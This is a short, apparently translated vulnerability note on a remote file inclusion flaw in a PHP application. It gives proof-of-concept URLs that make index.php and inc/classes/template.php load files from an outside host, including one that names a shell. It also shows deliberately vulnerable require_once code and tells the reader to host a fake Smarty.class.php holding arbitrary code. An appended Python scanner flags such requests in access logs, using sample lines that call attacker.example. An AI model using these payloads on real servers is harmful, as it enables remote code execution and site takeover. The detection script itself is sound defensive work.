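Because the variable passed to the include is never initialized, the script can be made to include an arbitrary file. Conditions:
1. register_globals = On
2. allow_url_fopen = On
With both set, the file can be included. PoC: www.r0expeR.Net/index.php?pathdir=http://www.r0expeR.Net/xx.txt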
<?php
// Vulnerable: the include path is taken straight from the request.
$poc = $_GET['pathdir'];
echo require_once($poc);
// PoC: http://www.r0expeR.Net/index.php?pathdir=Shell
?>
inc\classes\template.php
require_once( $dRootDir."inc/classes/smarty/Smarty.class.php" );
class template extends smarty
.......
http://www.xxx.com/inc/classes/template.php?dRootDir=http://www.自己的网站.com/
On your own site (the 自己的网站 host in the URL above), create inc/classes/smarty/Smarty.class.php
It can contain any code.
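
Both PoC requests above put a URL at the very start of a query parameter value (pathdir, dRootDir). As an added example, not part of the original note, this Python sketch flags such requests in a web server access log; the log lines, the attacker.example host and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address, request target and status from a combined-format log entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# URL schemes and PHP stream wrappers that take include/require off the local tree.
REMOTE_RE = re.compile(r'^\s*(?:(?:https?|ftps?|php|expect|phar|zip)://|data:)', re.I)

def fully_decode(value, rounds=3):
    """Conservatively undo repeated percent-encoding before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_include_params(lines):
    """Return (ip, path, param, value, status) for every .php request whose
    query parameter value begins with a remote scheme or stream wrapper."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith(".php"):
            continue
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw)
            if REMOTE_RE.match(value):
                hits.append((m["ip"], url.path, name, value, int(m["status"])))
    return hits

# Constructed sample entries: three suspicious requests, two benign ones.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?pathdir=http://attacker.example/xx.txt HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /inc/classes/template.php?dRootDir=http%3A%2F%2Fattacker.example%2F HTTP/1.1" 200 87',
    '198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /inc/classes/template.php?dRootDir=hTTp%253A%252F%252Fattacker.example%252F HTTP/1.1" 500 0',
    '192.0.2.10 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?pathdir=templates/default HTTP/1.1" 200 2048',
    '192.0.2.10 - - [10/Oct/2023:13:57:12 +0000] "GET /search.php?q=what+is+http://+in+a+link HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in find_remote_include_params(SAMPLE_LOG):
        print(hit)
```

Parameters that legitimately carry URLs, such as redirect targets, also match, so treat hits as triage leads; any direct request to a class file such as inc/classes/template.php deserves a look on its own.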